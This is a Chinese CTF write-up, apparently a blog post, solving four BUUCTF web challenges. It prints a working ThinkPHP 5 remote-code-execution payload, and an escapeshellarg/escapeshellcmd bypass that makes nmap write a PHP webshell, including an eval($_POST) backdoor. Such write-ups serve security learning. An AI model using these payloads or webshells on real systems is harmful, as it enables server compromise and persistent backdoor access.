本篇內容
[BJDCTF 2nd]old-hack
[BUUCTF 2018]Online Tool
[0CTF 2016]piapiapia
[ACTF2020 新生賽]Include
[BJDCTF 2nd]old-hack
發現是thinkphp5漏洞,使用Kali查一下漏洞利用方法:
我們查看一下最新的那個46150.txt
,看看是否可以利用,在kali命令行輸入:
cat /usr/share/exploitdb/exploits/php/webapps/46150.txt
嘗試一下它給的利用姿勢:
?s=captcha
然後POST:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
發現可行,嘗試換成ls /
看到flag字眼,然後cat /flag
拿到最終flag。
[BUUCTF 2018]Online Tool
訪問網址,直接出現以下代碼:
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox); //創建文件夾
chdir($sandbox); //移到該文件夾下
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
大致就是GET一個host
參數,經過escapeshellarg()
和escapeshellcmd()
函數處理後,用system命令來執行nmap掃描,掃描host傳入的東西。
escapeshellarg()和escapeshellcmd()函數一起使用會導致單引號逃逸,見大佬文章:談談escapeshellarg參數繞過和注入的問題。但是常見的命令注入操作如 | & 等不能用,因爲escapeshellcmd()函數對一些特殊符號會進行轉義。
其實,nmap命令可以將掃描結果寫入文件,參數如下表:
-oN 標準保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 補充保存文件
這樣,就可以構造payload了,但我都嘗試了,發現就一個-oG可用:
' <?php phpinfo();?> -oG shell.php '
經過escapeshellarg()
函數處理後就是(這裏<?php phpinfo();?>直接執行了,所以不顯示)
''\'' -oG shell.php '\'''
經過escapeshellcmd()
函數處理後就是
''\\'' \<\?php phpinfo\(\)\;\?\> -oG shell.php '\\'''
然後由於所有的單引號都已經配對,且\<\?php phpinfo\(\)\;\?\>
寫入shell.php後就又是<?php phpinfo();?>
了。
去嘗試一下,會生成一個文件夾且會進入該文件夾下:
' <?php phpinfo();?> -oG shell.php '
發現可行,那就直接改payload:
' <?php echo `ls /`;?> -oG shell.php '
查看flag:
' <?php echo `cat /flag`;?> -oG shell.php '
當然的,也可以使用菜刀連接,payload:
' <?php eval($_POST["a"]);?> -oG shell.php '
然後在根路徑下找到flag。
[0CTF 2016]piapiapia
這題考察反序列化逃逸
,說實話有些難度,會照着WP做,但自己的見解不深,直接放大佬博客:[0CTF 2016]piapiapia(反序列化逃逸)。
[ACTF2020 新生賽]Include
直接點擊tips
,出現如下提示:
試着用php://
僞協議做做看,出現了一串base64密文:
base64解密即可拿到最終flag。
========================================================
上一篇-----------------------------------目錄 -----------------------------------下一篇
========================================================
轉載請註明出處。
本文網址:https://blog.csdn.net/hiahiachang/article/details/105437591
========================================================